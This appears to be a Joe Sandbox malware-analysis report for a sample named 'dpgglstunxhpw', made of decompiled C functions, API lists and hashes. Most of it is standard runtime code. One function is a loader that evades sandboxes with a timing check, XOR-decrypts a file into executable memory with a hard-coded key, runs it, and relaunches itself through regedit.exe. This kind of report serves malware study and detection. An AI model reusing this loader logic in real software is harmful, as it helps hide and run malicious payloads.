                                      0x00405bee
                                      0x00405bee
                                      0x00000000
                                      0x00405bf2
                                      0x00405b7d
                                      0x00405b80
                                      0x00405b80
                                      0x00405b86
                                      0x00405b89
                                      0x00405bb0
                                      0x00405bb3
                                      0x00405bb3
                                      0x00405bb9
                                      0x00000000
                                      0x00000000
                                      0x00405bbb
                                      0x00405bbe
                                      0x00000000
                                      0x00000000
                                      0x00405bc0
                                      0x00405bc0
                                      0x00405bc0
                                      0x00405bc6
                                      0x00405bc9
                                      0x00405b38
                                      0x00405b38
                                      0x00405bd2
                                      0x00000000
                                      0x00405bd2
                                      0x00405b8b
                                      0x00405b8e
                                      0x00000000
                                      0x00000000
                                      0x00405b92
                                      0x00405ba0
                                      0x00405ba3
                                      0x00405ba9
                                      0x00405bab
                                      0x00405bae
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00405bae
                                      0x00405b4c
                                      0x00405b4f
                                      0x00405b51
                                      0x00405b56
                                      0x00405b56
                                      0x00000000
                                      0x00405b27
                                      0x00405b27
                                      0x00405b2c
                                      0x00405b30
                                      0x00405b30
                                      0x00000000
                                      0x00405b2c
                                      0x00405b25

                                      APIs
                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00405B3F
                                      • __isleadbyte_l.LIBCMT ref: 00405B72
                                      • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,50036ACC,00BFBBEF,00000000,?,?,?,0040766E,00000109,00BFBBEF,00000003), ref: 00405BA3
                                      • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,0040766E,00000109,00BFBBEF,00000003), ref: 00405C11
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.957134407.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000008.00000002.957101736.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000008.00000002.957143775.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000008.00000002.957150990.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_dpgglstunxhpw.jbxd
                                      Similarity
                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                      • String ID:
                                      • API String ID: 3058430110-0
                                      • Opcode ID: 141919e07fd5e067c6abddc3c99e875ae955f847959586c4bcd4af50d38ae265
                                      • Instruction ID: 5a3d825bf4fd5e60fce72e168d96e71c75f88ca3a22c931a5470049bf8964804
                                      • Opcode Fuzzy Hash: 141919e07fd5e067c6abddc3c99e875ae955f847959586c4bcd4af50d38ae265
                                      • Instruction Fuzzy Hash: C5318B31A0064AEFDB20DF64C894AAB3BB5EF01310B1585BAE461AB2D1E734FD41DF59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0040409C() {
                                      				WCHAR* _t2;
                                      				void* _t15;
                                      				WCHAR* _t17;
                                      
                                      				_t2 = GetEnvironmentStringsW();
                                      				_t17 = _t2;
                                      				if(_t17 != 0) {
                                      					if( *_t17 != 0) {
                                      						goto L3;
                                      						do {
                                      							do {
                                      								L3:
                                      								_t2 =  &(_t2[1]);
                                      							} while ( *_t2 != 0);
                                      							_t2 =  &(_t2[1]);
                                      						} while ( *_t2 != 0);
                                      					}
                                      					_t1 = _t2 - _t17 + 2; // -2
                                      					_t10 = _t1;
                                      					_t15 = E0040599B(_t1);
                                      					if(_t15 != 0) {
                                      						E00405D30(_t15, _t17, _t10);
                                      					}
                                      					FreeEnvironmentStringsW(_t17);
                                      					return _t15;
                                      				} else {
                                      					return 0;
                                      				}
                                      			}






                                      0x0040409f
                                      0x004040a5
                                      0x004040ab
                                      0x004040b4
                                      0x00000000
                                      0x004040b6
                                      0x004040b6
                                      0x004040b6
                                      0x004040b6
                                      0x004040b9
                                      0x004040be
                                      0x004040c1
                                      0x004040b6
                                      0x004040c9
                                      0x004040c9
                                      0x004040d3
                                      0x004040d8
                                      0x004040ea
                                      0x004040ef
                                      0x004040db
                                      0x004040e6
                                      0x004040ad
                                      0x004040b0
                                      0x004040b0

                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32(00000000,00401BD2), ref: 0040409F
                                      • __malloc_crt.LIBCMT ref: 004040CE
                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004040DB
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.957134407.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000008.00000002.957101736.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000008.00000002.957143775.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000008.00000002.957150990.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_dpgglstunxhpw.jbxd
                                      Similarity
                                      • API ID: EnvironmentStrings$Free__malloc_crt
                                      • String ID:
                                      • API String ID: 237123855-0
                                      • Opcode ID: 14169bbc8571f82bacdc69083f80bd088523dcdba3bfa209bcddabe28d853220
                                      • Instruction ID: 1fa36d951bb440bfa3f85e2b48734ef180dce86ebb10b8179ed48f040844c6ea
                                      • Opcode Fuzzy Hash: 14169bbc8571f82bacdc69083f80bd088523dcdba3bfa209bcddabe28d853220
                                      • Instruction Fuzzy Hash: 61F0E2F75110109ACB31BB35BC498672378DAD536430A483BF701F33C1FA388D8186AA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      C-Code - Quality: 66%
                                      			E00401000(struct HINSTANCE__* _a4, long _a12) {
                                      				int _v8;
                                      				char _v12;
                                      				struct _PROCESS_INFORMATION _v28;
                                      				struct tagMSG _v56;
                                      				struct _STARTUPINFOW _v124;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				void* __ebp;
                                      				long _t34;
                                      				long _t35;
                                      				WCHAR* _t37;
                                      				void* _t39;
                                      				int _t45;
                                      				int _t47;
                                      				struct HWND__* _t52;
                                      				int _t62;
                                      				void* _t66;
                                      				long _t68;
                                      				void* _t76;
                                      				struct HINSTANCE__* _t77;
                                      				struct HACCEL__* _t78;
                                      				long _t79;
                                      				long _t80;
                                      				struct HWND__** _t81;
                                      				signed int _t82;
                                      				void* _t88;
                                      				signed int _t89;
                                      				void* _t93;
                                      
                                      				_t34 = GetTickCount();
                                      				Sleep(0x2be); // executed
                                      				_t35 = GetTickCount();
                                      				_t96 = _t35 - _t34 - 0x2bc;
                                      				if(_t35 - _t34 < 0x2bc) {
                                      					L4:
                                      					_t37 = GetCommandLineW();
                                      					0x400000(_t37);
                                      					if(_t37 == 0) {
                                      						_t39 = GetCurrentProcess();
                                      						__imp__IsWow64Process(_t39,  &_v8);
                                      						__eflags = _t39;
                                      						if(_t39 == 0) {
                                      							L11:
                                      							__imp__#17();
                                      							_t77 = _a4;
                                      							LoadStringW(_t77, 0x67, 0x40cee0, 6);
                                      							LoadStringW(_t77, 0xa1, 0x40dd40, 9);
                                      							 *0x40dd3c = _t77;
                                      							__eflags = _a12;
                                      							if(_a12 == 0) {
                                      								goto L5;
                                      							}
                                      							_t78 = LoadAcceleratorsW(_t77, 0x6d);
                                      							while(1) {
                                      								_t45 = GetMessageW( &_v56, 0, 0, 0);
                                      								__eflags = _t45;
                                      								if(_t45 == 0) {
                                      									break;
                                      								}
                                      								_t47 = TranslateAcceleratorW( *0x40ddc0, _t78,  &_v56);
                                      								__eflags = _t47;
                                      								if(_t47 != 0) {
                                      									continue;
                                      								}
                                      								__eflags = _v56.message - 0x100;
                                      								if(_v56.message != 0x100) {
                                      									L18:
                                      									TranslateMessage( &_v56);
                                      									DispatchMessageW( &_v56);
                                      									continue;
                                      								}
                                      								__eflags = _v56.wParam - 9;
                                      								if(_v56.wParam != 9) {
                                      									goto L18;
                                      								}
                                      								_t52 = GetParent(_v56);
                                      								_t81 =  *0x400000; // 0x905a4d
                                      								__eflags = _t52 -  *_t81;
                                      								if(_t52 !=  *_t81) {
                                      									goto L18;
                                      								}
                                      								PostMessageW( *_t81, 0x111, 0x8067, 0);
                                      							}
                                      							DestroyMenu( *0x40ddc4);
                                      							return _v56.wParam;
                                      						}
                                      						__eflags = _v8;
                                      						if(_v8 == 0) {
                                      							goto L11;
                                      						}
                                      						_t79 = 0x44;
                                      						E00401A70( &_v124, 0, _t79);
                                      						_v124.cb = _t79;
                                      						__imp__Wow64DisableWow64FsRedirection( &_v12);
                                      						_t62 = CreateProcessW(L"C:\\windows\\regedit.exe", GetCommandLineW(), 0, 0, 0, 0, 0, 0,  &_v124,  &_v28);
                                      						__eflags = _t62;
                                      						if(_t62 == 0) {
                                      							__imp__Wow64RevertWow64FsRedirection(_v12);
                                      							goto L11;
                                      						}
                                      						WaitForSingleObject(_v28.hProcess, 0xffffffff);
                                      						GetExitCodeProcess(_v28,  &_a12);
                                      						ExitProcess(_a12);
                                      					}
                                      					L5:
                                      					return 0;
                                      				}
                                      				_t66 = E00401A4F(_a12, L"rb"); // executed
                                      				_push(2);
                                      				_t88 = _t66;
                                      				_push(0);
                                      				_push(_t88); // executed
                                      				E00401915(_t76, _t88, 0, _t96); // executed
                                      				_push(_t88);
                                      				_t68 = E00401826(_t76, _t88, 0, _t96);
                                      				_push(0);
                                      				_push(0);
                                      				_push(_t88);
                                      				_t80 = _t68;
                                      				E00401915(_t80, _t88, 0, _t96);
                                      				_a12 = VirtualAlloc(0, _t80, 0x3000, 0x40);
                                      				E00401675(_t70, _t80, 1, _t88);
                                      				_t93 = _t93 + 0x34;
                                      				_t82 = 0;
                                      				if(_t80 <= 0) {
                                      					L3:
                                      					_a12();
                                      					goto L4;
                                      				} else {
                                      					goto L2;
                                      				}
                                      				do {
                                      					L2:
                                      					asm("cdq");
                                      					_t89 = 0xc;
                                      					 *(_t82 + _a12) =  *(_t82 + _a12) ^  *("248058040134" + _t82 % _t89);
                                      					_t82 = _t82 + 1;
                                      				} while (_t82 < _t80);
                                      				goto L3;
                                      			}
































                                      0x0040100f
                                      0x00401018
                                      0x0040101e
                                      0x00401024
                                      0x00401029
                                      0x00401097
                                      0x0040109d
                                      0x004010a0
                                      0x004010a7
                                      0x004010b4
                                      0x004010bb
                                      0x004010c1
                                      0x004010c3
                                      0x00401132
                                      0x00401132
                                      0x00401138
                                      0x0040114b
                                      0x0040115a
                                      0x0040115c
                                      0x00401162
                                      0x00401165
                                      0x00000000
                                      0x00000000
                                      0x0040117a
                                      0x004011de
                                      0x004011e5
                                      0x004011e7
                                      0x004011e9
                                      0x00000000
                                      0x00000000
                                      0x00401189
                                      0x0040118f
                                      0x00401191
                                      0x00000000
                                      0x00000000
                                      0x00401193
                                      0x0040119a
                                      0x004011ca
                                      0x004011ce
                                      0x004011d8
                                      0x00000000
                                      0x004011d8
                                      0x0040119c
                                      0x004011a0
                                      0x00000000
                                      0x00000000
                                      0x004011a5
                                      0x004011ab
                                      0x004011b1
                                      0x004011b3
                                      0x00000000
                                      0x00000000
                                      0x004011c2
                                      0x004011c2
                                      0x004011f1
                                      0x00000000
                                      0x004011f7
                                      0x004010c5
                                      0x004010c8
                                      0x00000000
                                      0x00000000
                                      0x004010cc
                                      0x004010d3
                                      0x004010df
                                      0x004010e2
                                      0x004010fe
                                      0x00401104
                                      0x00401106
                                      0x0040112c
                                      0x00000000
                                      0x0040112c
                                      0x0040110d
                                      0x0040111a
                                      0x00401123
                                      0x00401123
                                      0x004010a9
                                      0x00000000
                                      0x004010a9
                                      0x00401033
                                      0x00401038
                                      0x0040103a
                                      0x0040103c
                                      0x0040103d
                                      0x0040103e
                                      0x00401043
                                      0x00401044
                                      0x00401049
                                      0x0040104a
                                      0x0040104b
                                      0x0040104c
                                      0x0040104e
                                      0x0040106a
                                      0x0040106d
                                      0x00401072
                                      0x00401075
                                      0x00401079
                                      0x00401094
                                      0x00401094
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040107b
                                      0x0040107b
                                      0x0040107d
                                      0x00401080
                                      0x0040108c
                                      0x0040108f
                                      0x00401090
                                      0x00000000

                                      APIs
                                      • GetTickCount.KERNEL32 ref: 0040100F
                                      • Sleep.KERNELBASE(000002BE), ref: 00401018
                                      • GetTickCount.KERNEL32 ref: 0040101E
                                      • GetCommandLineW.KERNEL32 ref: 0040109D
                                        • Part of subcall function 00401A4F: __wfsopen.LIBCMT ref: 00401A5C
                                      • _fseek.LIBCMT ref: 0040103E
                                      • _fseek.LIBCMT ref: 0040104E
                                        • Part of subcall function 00401915: __lock_file.LIBCMT ref: 00401956
                                        • Part of subcall function 00401915: __fseek_nolock.LIBCMT ref: 00401967
                                      • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 0040105F
                                      • __fread_nolock.LIBCMT ref: 0040106D
                                      • GetCurrentProcess.KERNEL32(?), ref: 004010B4
                                      • IsWow64Process.KERNEL32(00000000), ref: 004010BB
                                      • _memset.LIBCMT ref: 004010D3
                                      • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 004010E2
                                      • GetCommandLineW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004010F6
                                      • CreateProcessW.KERNEL32(C:\windows\regedit.exe,00000000), ref: 004010FE
                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040110D
                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 0040111A
                                      • ExitProcess.KERNEL32 ref: 00401123
                                      • Wow64RevertWow64FsRedirection.KERNEL32(?), ref: 0040112C
                                      • #17.COMCTL32 ref: 00401132
                                      • LoadStringW.USER32(?,00000067,0040CEE0,00000006), ref: 0040114B
                                      • LoadStringW.USER32(?,000000A1,0040DD40,00000009), ref: 0040115A
                                      • LoadAcceleratorsW.USER32 ref: 0040116E
                                      • TranslateAcceleratorW.USER32(00000000,?), ref: 00401189
                                      • GetParent.USER32(?), ref: 004011A5
                                      • PostMessageW.USER32 ref: 004011C2
                                      • TranslateMessage.USER32(?), ref: 004011CE
                                      • DispatchMessageW.USER32(?), ref: 004011D8
                                      • GetMessageW.USER32 ref: 004011E5
                                      • DestroyMenu.USER32 ref: 004011F1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.986629168.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.986624639.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 0000000B.00000002.986636336.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 0000000B.00000002.986641539.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_dpgglstunxhpw.jbxd
                                      Similarity
                                      • API ID: ProcessWow64$Message$Load$CommandCountExitLineRedirectionStringTickTranslate_fseek$AcceleratorAcceleratorsAllocCodeCreateCurrentDestroyDisableDispatchMenuObjectParentPostRevertSingleSleepVirtualWait__fread_nolock__fseek_nolock__lock_file__wfsopen_memset
                                      • String ID: C:\windows\regedit.exe
                                      • API String ID: 735618220-2898893780
                                      • Opcode ID: 13f8cff66a533022ee180b1c7ee89b48ba83d43a267836f3488401742cd5cd2c
                                      • Instruction ID: b5c5d907f046bb421fc019989e3b7981bd47ba42383611c00ead7985f5c1367a
                                      • Opcode Fuzzy Hash: 13f8cff66a533022ee180b1c7ee89b48ba83d43a267836f3488401742cd5cd2c
                                      • Instruction Fuzzy Hash: EE516C71A00209ABEB10AFB1DD49EAF7B7DAF49754F100036F601B61E2D7788D41CB68
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 35 401de7-401dfa DecodePointer 36 401dfc 35->36 37 401dff-401e1b call 401dc2 call 401de7 35->37 36->37 42 401e20-401e23 37->42
                                      APIs
                                      • DecodePointer.KERNEL32(?,00401E20,00000000,00000000,00000000,00000000,00000000,00406B17,?,00402436,00000003,00401308,00000001,00000000,00000000), ref: 00401DF2
                                      • __invoke_watson.LIBCMT ref: 00401E0E
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.986629168.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.986624639.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 0000000B.00000002.986636336.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 0000000B.00000002.986641539.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_dpgglstunxhpw.jbxd
                                      Similarity
                                      • API ID: DecodePointer__invoke_watson
                                      • String ID:
                                      • API String ID: 4034010525-0
                                      • Opcode ID: b0500e1ec9f77219aeb5e17d6dfa6b312d4f4269004dd2458cfd01cf64ae9f47
                                      • Instruction ID: 082bb326a77743ce014774677ee0fbcbc0c9760a31ecf5b101ea5fa056083c42
                                      • Opcode Fuzzy Hash: b0500e1ec9f77219aeb5e17d6dfa6b312d4f4269004dd2458cfd01cf64ae9f47
                                      • Instruction Fuzzy Hash: 6CE0EC3211010ABBDF022FA5DD099AA3FA7FF44350B444435FD1495071DA36D931EB99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 43 40854c-408556 44 408573-40857c 43->44 45 408558-408562 43->45 47 40857e 44->47 48 40857f-408584 44->48 45->44 46 408564-408572 call 401e66 45->46 47->48 50 408586-408597 RtlAllocateHeap 48->50 51 408599-4085a0 48->51 50->51 53 4085cb-4085cd 50->53 54 4085a2-4085ab call 402477 51->54 55 4085be-4085c3 51->55 54->48 59 4085ad-4085b2 54->59 55->53 56 4085c5 55->56 56->53 60 4085b4 59->60 61 4085ba-4085bc 59->61 60->61 61->53
                                      C-Code - Quality: 86%
                                      			E0040854C(signed int _a4, signed int _a8, long _a12) {
                                      				void* _t10;
                                      				long _t11;
                                      				long _t12;
                                      				signed int _t13;
                                      				signed int _t17;
                                      				long _t19;
                                      				long _t24;
                                      
                                      				_t17 = _a4;
                                      				if(_t17 == 0) {
                                      					L3:
                                      					_t24 = _t17 * _a8;
                                      					__eflags = _t24;
                                      					if(_t24 == 0) {
                                      						_t24 = _t24 + 1;
                                      						__eflags = _t24;
                                      					}
                                      					goto L5;
                                      					L6:
                                      					_t10 = RtlAllocateHeap( *0x40cfc4, 8, _t24); // executed
                                      					__eflags = 0;
                                      					if(0 == 0) {
                                      						goto L7;
                                      					}
                                      					L14:
                                      					return _t10;
                                      					goto L15;
                                      					L7:
                                      					__eflags =  *0x40d62c;
                                      					if( *0x40d62c == 0) {
                                      						_t19 = _a12;
                                      						__eflags = _t19;
                                      						if(_t19 != 0) {
                                      							 *_t19 = 0xc;
                                      						}
                                      					} else {
                                      						_t11 = E00402477(_t10, _t24);
                                      						__eflags = _t11;
                                      						if(_t11 != 0) {
                                      							L5:
                                      							_t10 = 0;
                                      							__eflags = _t24 - 0xffffffe0;
                                      							if(_t24 > 0xffffffe0) {
                                      								goto L7;
                                      							} else {
                                      								goto L6;
                                      							}
                                      						} else {
                                      							_t12 = _a12;
                                      							__eflags = _t12;
                                      							if(_t12 != 0) {
                                      								 *_t12 = 0xc;
                                      							}
                                      							_t10 = 0;
                                      						}
                                      					}
                                      					goto L14;
                                      				} else {
                                      					_t13 = 0xffffffe0;
                                      					_t27 = _t13 / _t17 - _a8;
                                      					if(_t13 / _t17 >= _a8) {
                                      						goto L3;
                                      					} else {
                                      						 *((intOrPtr*)(E00401E66(_t27))) = 0xc;
                                      						return 0;
                                      					}
                                      				}
                                      				L15:
                                      			}










                                      0x00408551
                                      0x00408556
                                      0x00408573
                                      0x00408578
                                      0x0040857a
                                      0x0040857c
                                      0x0040857e
                                      0x0040857e
                                      0x0040857e
                                      0x00000000
                                      0x00408586
                                      0x0040858f
                                      0x00408595
                                      0x00408597
                                      0x00000000
                                      0x00000000
                                      0x004085cb
                                      0x004085cd
                                      0x00000000
                                      0x00408599
                                      0x00408599
                                      0x004085a0
                                      0x004085be
                                      0x004085c1
                                      0x004085c3
                                      0x004085c5
                                      0x004085c5
                                      0x004085a2
                                      0x004085a3
                                      0x004085a9
                                      0x004085ab
                                      0x0040857f
                                      0x0040857f
                                      0x00408581
                                      0x00408584
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004085ad
                                      0x004085ad
                                      0x004085b0
                                      0x004085b2
                                      0x004085b4
                                      0x004085b4
                                      0x004085ba
                                      0x004085ba
                                      0x004085ab
                                      0x00000000
                                      0x00408558
                                      0x0040855c
                                      0x0040855f
                                      0x00408562
                                      0x00000000
                                      0x00408564
                                      0x00408569
                                      0x00408572
                                      0x00408572
                                      0x00408562
                                      0x00000000

                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004059F6,?,?,00000000,00000000,00000000,?,004042A2,00000001,00000214,?,00401038), ref: 0040858F
                                        • Part of subcall function 00401E66: __getptd_noexit.LIBCMT ref: 00401E66
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.986629168.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.986624639.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 0000000B.00000002.986636336.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 0000000B.00000002.986641539.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_dpgglstunxhpw.jbxd
                                      Similarity
                                      • API ID: AllocateHeap__getptd_noexit
                                      • String ID:
                                      • API String ID: 328603210-0
                                      • Opcode ID: 78cb4feb16e057d0e2cb3cebff3c2ab0fabc03ed057622e3e76df3dd97b03fd8
                                      • Instruction ID: 13c43ce280eb49603ccc5c5fb654576f0c81eb5202d9f2d83ad5a1bfaa1574fb
                                      • Opcode Fuzzy Hash: 78cb4feb16e057d0e2cb3cebff3c2ab0fabc03ed057622e3e76df3dd97b03fd8
                                      • Instruction Fuzzy Hash: F501F531600211ABEB249F31DE45F6B3784ABA0370F00853FE895AB2D0CF38CC008A4C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 62 401a4f-401a65 call 401991
                                      C-Code - Quality: 25%
                                      			E00401A4F(intOrPtr _a4, intOrPtr _a8) {
                                      				void* __ebp;
                                      				void* _t3;
                                      				void* _t4;
                                      				void* _t5;
                                      				void* _t6;
                                      				void* _t9;
                                      
                                      				_push(0x40);
                                      				_push(_a8);
                                      				_push(_a4);
                                      				_t3 = E00401991(_t4, _t5, _t6, _t9); // executed
                                      				return _t3;
                                      			}









                                      0x00401a54
                                      0x00401a56
                                      0x00401a59
                                      0x00401a5c
                                      0x00401a65

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.986629168.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.986624639.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 0000000B.00000002.986636336.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 0000000B.00000002.986641539.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_dpgglstunxhpw.jbxd
                                      Similarity
                                      • API ID: __wfsopen
                                      • String ID:
                                      • API String ID: 197181222-0
                                      • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                      • Instruction ID: 73ab95eaebed31112dedeb384939a99c41ea5e8962cc08f2dd2c4e48d81c1728
                                      • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                      • Instruction Fuzzy Hash: 39C09B7244410C77CF111947DC02E553F1997C0774F444031FB1C1D171B577D561D589
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 65 404140-404148 RtlEncodePointer
                                      APIs
                                      • RtlEncodePointer.NTDLL(00000000,004067F2,0040D000,00000314,00000000,?,?,?,?,?,004023BD,0040D000,Microsoft Visual C++ Runtime Library,00012010), ref: 00404142
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.986629168.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.986624639.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 0000000B.00000002.986636336.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 0000000B.00000002.986641539.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_dpgglstunxhpw.jbxd
                                      Similarity
                                      • API ID: EncodePointer
                                      • String ID:
                                      • API String ID: 2118026453-0
                                      • Opcode ID: 07cf166470ea6c05c1575d7841d168e8ca1cf770de9049bf1a34cfa88c9a7e15
                                      • Instruction ID: 320fb652cea0c6775c1c8cbb56ecac6aa1c380c61b5076c787df298dad675eb3
                                      • Opcode Fuzzy Hash: 07cf166470ea6c05c1575d7841d168e8ca1cf770de9049bf1a34cfa88c9a7e15
                                      • Instruction Fuzzy Hash:
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 85%
                                      			E00404F4C(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                      				intOrPtr _v0;
                                      				void* _v804;
                                      				intOrPtr _v808;
                                      				intOrPtr _v812;
                                      				intOrPtr _t6;
                                      				intOrPtr _t11;
                                      				intOrPtr _t12;
                                      				intOrPtr _t13;
                                      				long _t17;
                                      				intOrPtr _t21;
                                      				intOrPtr _t22;
                                      				intOrPtr _t25;
                                      				intOrPtr _t26;
                                      				intOrPtr _t27;
                                      				intOrPtr* _t31;
                                      				void* _t34;
                                      
                                      				_t27 = __esi;
                                      				_t26 = __edi;
                                      				_t25 = __edx;
                                      				_t22 = __ecx;
                                      				_t21 = __ebx;
                                      				_t6 = __eax;
                                      				_t34 = _t22 -  *0x40c560; // 0xd9d4c7f6
                                      				if(_t34 == 0) {
                                      					asm("repe ret");
                                      				}
                                      				 *0x40db08 = _t6;
                                      				 *0x40db04 = _t22;
                                      				 *0x40db00 = _t25;
                                      				 *0x40dafc = _t21;
                                      				 *0x40daf8 = _t27;
                                      				 *0x40daf4 = _t26;
                                      				 *0x40db20 = ss;
                                      				 *0x40db14 = cs;
                                      				 *0x40daf0 = ds;
                                      				 *0x40daec = es;
                                      				 *0x40dae8 = fs;
                                      				 *0x40dae4 = gs;
                                      				asm("pushfd");
                                      				_pop( *0x40db18);
                                      				 *0x40db0c =  *_t31;
                                      				 *0x40db10 = _v0;
                                      				 *0x40db1c =  &_a4;
                                      				 *0x40da58 = 0x10001;
                                      				_t11 =  *0x40db10; // 0x0
                                      				 *0x40da0c = _t11;
                                      				 *0x40da00 = 0xc0000409;
                                      				 *0x40da04 = 1;
                                      				_t12 =  *0x40c560; // 0xd9d4c7f6
                                      				_v812 = _t12;
                                      				_t13 =  *0x40c564; // 0x262b3809
                                      				_v808 = _t13;
                                      				 *0x40da50 = IsDebuggerPresent();
                                      				_push(1);
                                      				E00404F44(_t14);
                                      				SetUnhandledExceptionFilter(0);
                                      				_t17 = UnhandledExceptionFilter(0x40a360);
                                      				if( *0x40da50 == 0) {
                                      					_push(1);
                                      					E00404F44(_t17);
                                      				}
                                      				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                      			}



















                                      0x00404f4c
                                      0x00404f4c
                                      0x00404f4c
                                      0x00404f4c
                                      0x00404f4c
                                      0x00404f4c
                                      0x00404f4c
                                      0x00404f52
                                      0x00404f54
                                      0x00404f54
                                      0x00407bf6
                                      0x00407bfb
                                      0x00407c01
                                      0x00407c07
                                      0x00407c0d
                                      0x00407c13
                                      0x00407c19
                                      0x00407c20
                                      0x00407c27
                                      0x00407c2e
                                      0x00407c35
                                      0x00407c3c
                                      0x00407c43
                                      0x00407c44
                                      0x00407c4d
                                      0x00407c55
                                      0x00407c5d
                                      0x00407c68
                                      0x00407c72
                                      0x00407c77
                                      0x00407c7c
                                      0x00407c86
                                      0x00407c90
                                      0x00407c95
                                      0x00407c9b
                                      0x00407ca0
                                      0x00407cac
                                      0x00407cb1
                                      0x00407cb3
                                      0x00407cbb
                                      0x00407cc6
                                      0x00407cd3
                                      0x00407cd5
                                      0x00407cd7
                                      0x00407cdc
                                      0x00407cf0

                                      APIs
                                      • IsDebuggerPresent.KERNEL32 ref: 00407CA6
                                      • SetUnhandledExceptionFilter.KERNEL32 ref: 00407CBB
                                      • UnhandledExceptionFilter.KERNEL32(0040A360), ref: 00407CC6
                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 00407CE2
                                      • TerminateProcess.KERNEL32(00000000), ref: 00407CE9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.986629168.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
